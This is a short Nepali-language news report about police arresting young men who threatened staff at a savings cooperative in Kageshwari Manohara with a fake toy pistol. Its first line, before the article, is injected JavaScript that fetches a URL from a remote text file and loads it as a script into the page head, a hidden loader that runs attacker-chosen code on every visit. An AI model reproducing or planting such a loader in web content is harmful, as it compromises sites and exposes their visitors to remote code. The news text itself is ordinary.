;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाडौं । कागेश्वरी मनोहरा नगरपालिका-८ बस्ने २५ वर्षीय अलबहादुर बम र सोही ठाउँ बस्ने हुम्ला खार्पुनाथ गाउँपालिका-१ घर भएका १८ वर्षीय किशोरहरुले नक्कली पेस्तोल देखाइ धम्की दिएको अभियोगमा प्रहरीले पक्राउ गरेको छ ।
कागेश्वरी मनोहरा नगरपालिका-७ मुलपानी भैरबचौरस्थित भैरब बचत तथा ऋण सहकारी संस्थामा नक्कली पेस्तोल देखाई धाकधम्की दिएको अभियोगमा उनीहरुलाई सोमबार बिहान प्रहरीले पक्राउ गरेको हो ।
उक्त संस्थामा बा ६५ प ४०८७ नम्बरको स्कुटरमा आएका व्यक्तिहरुले आइतबार दिउँसो पेस्तोल देखाई धम्की दिएका थिए । पक्राउ परेका उनीहरुको साथबाट नक्कली खेलौना पेस्तोल १ थान र उक्त स्कुटर प्रहरीले बरामद गरेको छ भने थप अनुसन्धान भइरहेको प्रहरीले बताएको छ।
फेसबुक प्रतिक्रियाहरु